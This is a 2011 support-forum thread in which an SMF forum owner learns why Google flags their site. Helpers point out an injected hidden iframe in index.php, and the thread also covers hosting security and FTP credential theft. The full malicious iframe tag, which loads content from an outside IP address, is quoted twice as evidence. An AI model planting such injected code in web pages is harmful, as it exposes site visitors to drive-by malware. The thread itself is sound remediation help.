Google thinks my website has a malware

Joazo · January 23, 2011, 10:29:11 AM

Google thinks my website has a malware but it's false 100%.
My website URL is www.magicpt.org.

Using SMF 2.0 RC4 with simpleportal 2.3.3.
What should I do?

Aleksi "Lex" Kilpinen · January 23, 2011, 10:39:12 AM

Actually, Google is probably right.

You have a hidden iframe in the code with

Code Select


<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=e0c2d48508fe124aee2727c5246ce60a&hashpage=07b8f1ff96250041b12099f711f72651" width=10 border=1 height=10 style="visibility:hidden"></iframe>

Masterd · January 23, 2011, 10:51:19 AM

Ask your host to scan your forum.

Joazo · January 23, 2011, 10:55:19 AM

@LexArma

How do i remove this iframe?

Aleksi "Lex" Kilpinen · January 23, 2011, 10:57:43 AM

Well, you should really go through all your files to make sure they haven't been tampered with, just removing that line alone might not help much, and I'm not sure where that bit of code is actually hidden either...

Masterd · January 23, 2011, 10:58:22 AM

Quote from: Masterd on January 23, 2011, 10:51:19 AM
Ask your host to scan your forum.

Joazo · January 23, 2011, 11:39:17 AM

I asked my host. They told me they checked and it's clean. They told me to go to google webmasters and check my website there. I did it but still i have no idea how to remove the harmful code. My website was all ok yesterday and i didn't touch anything in the FTP or w/e. I went to sleep and woke up in the morning and saw it. How can that be?

Illori · January 23, 2011, 01:13:24 PM

do you have any other php apps/scripts running on your server? who is your host?

Joazo · January 23, 2011, 02:10:09 PM

@Illori

I just run SMF 2.0 RC4 with simpleportal 2.3.3 not other kinds of things.
My host is www.siteground.com.

P.S
I found in the index.php this:
<iframe src="http://80.91.191.158/stats/priemIframe.php?part=2&hashftp=e0c2d48508fe124aee2727c5246ce60a&hashpage=07b8f1ff96250041b12099f711f72651" width=10 border=1 height=10 style="visibility:hidden"></iframe>

I removed it. I hope this was the problem but now the question is how someone was able to get to my index.php? anyway i changed my FTP password.

Illori · January 23, 2011, 02:12:52 PM

it is possible that your host is an overseller, and therefore may have had a security issue where another server was hacked and got access to yours. please let your host know of the issue.

Joazo · January 23, 2011, 02:18:02 PM

I alraedy told them and they told me its all clean

Illori · January 23, 2011, 02:18:39 PM

well tell them it is not and show them the line you quoted above as proof

Road Rash Jr. · January 23, 2011, 02:28:28 PM

Your Host has indicated your shared server is clean and the presents of that code does not suggest it isn't. It does show that someone or something changed it. Best bet would be to write protect your index.php and any other files that don't require writing to by SMF.
This can be done with any FTP program.

Joazo · January 24, 2011, 12:56:24 AM

How can I protect the index.php?

Illori · January 24, 2011, 05:31:40 AM

what do you mean protect? if you have a good host you should have no problems with hacking given permissions are correct on the files/folders. How do I chmod? / what is chmod?

Aleksi "Lex" Kilpinen · January 24, 2011, 05:46:47 AM

On a properly configured host, and a default SMF install, the permissions don't really matter much either.
And no - just write protecting files will not probably help, if someone is able to modify your files that someone is probably able to create files as well - so there is a hole somewhere to be patched, but where and how to patch it is another thing completely...

If your host says your server and account is clean, and still you found a piece of malicious code - you should present your host with that code, tell them what file you found it in, and ask them to find out how it got there.

int13 · January 25, 2011, 04:17:37 PM

Hi,

its not a fault of the webapplication. Its the fault of filezilla... Your credentials have been saved by this programm silently. And now a malware got these files from you. So the hack was done with your FTP/SSH credentials! You have to manually disable kiosk mode on filezilla to prevent this. And better change all your passwords!

See my blog for more info on this:

Link removed by K@

kat · January 25, 2011, 04:35:02 PM

He MAY have a point.

http://forum.filezilla-project.org/viewtopic.php?f=1&t=10376

http://sww.co.nz/an-alternative-to-storing-passwords-in-filezilla-or-other-ftp-clients/

http://www.eukhost.com/forums/f20/ftp-filezilla-8775/index2.html

http://seclists.org/fulldisclosure/2010/Oct/189

'course, he could be Spamming, too...

Aleksi "Lex" Kilpinen · January 25, 2011, 11:41:11 PM

Yes, it's always a good idea in these cases to make sure your own computer is clean, there have been cases of malware using saved passwords from FTP clients and such. But it doesn't automatically mean that's what happened here.

Joazo · January 26, 2011, 02:29:10 AM

I am actually using FlashFXP and not fileazilla.
Anyway we used a backup of our FTP files to the day before it happened and changed passwords to all.
Also installed forum firewall and our host gave us some lines to put inside the .htaccess aganist bad bots.
I hope it's enough.

News:

Google thinks my website has a malware

kat